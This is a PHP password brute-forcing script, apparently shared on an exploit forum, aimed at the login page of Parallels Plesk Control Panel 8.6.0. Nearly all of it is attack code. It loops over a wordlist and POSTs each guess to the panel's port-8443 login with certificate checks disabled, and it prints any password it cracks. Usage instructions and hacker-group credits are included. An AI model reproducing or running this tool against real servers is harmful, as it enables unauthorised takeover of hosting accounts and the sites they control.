Parallels Plesk Control Panel 8.6.0 *If you want to use another version of plesk ,please change "$postfields" variable's content. *Usage -> php plesk-brute.php site.com username wordlist *Dont Forget.Without http or https format in site.com *Example -> php plesk-brute.php burtay.org admin mywl.txt ----------------------------------------------------------------------------------- */ set_time_limit(0); class plesk_brute { private $regex = '
'; private function post($url,$postfields) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,$postfields); curl_setopt($curl,CURLOPT_URL,$url); $kaynak = curl_exec($curl); curl_close($curl); return $kaynak; } private function wordlist_oku($wordlist) { return file($wordlist); } public function aban($url,$username,$wordlist) { echo "-------------------------------------------------------------\n"; echo "Plesk Panel Brute Forcer V.1.0 \n"; echo "Coded by Burtay \n"; echo "Rootarea.com Megaturks.Net Burtay.Org Cyber-Warrior.Org\n\n"; $liste = $this->wordlist_oku($wordlist); foreach($liste as $password) { echo "[+]Testing -> ".trim($password)."\n"; $postfields = "passwd=".trim($password)."&login_locale=default&login_name=".$username; $kaynak = $this->post($url,$postfields); if(!eregi($this->regex,$kaynak)) { echo "[+]Password Cracked -> ".$password; die("\nThe End Lan"); } } } } $class = new plesk_brute(); $class->aban("https://".$argv[1].":8443/login_up.php3",$argv[2],$argv[3]); ?>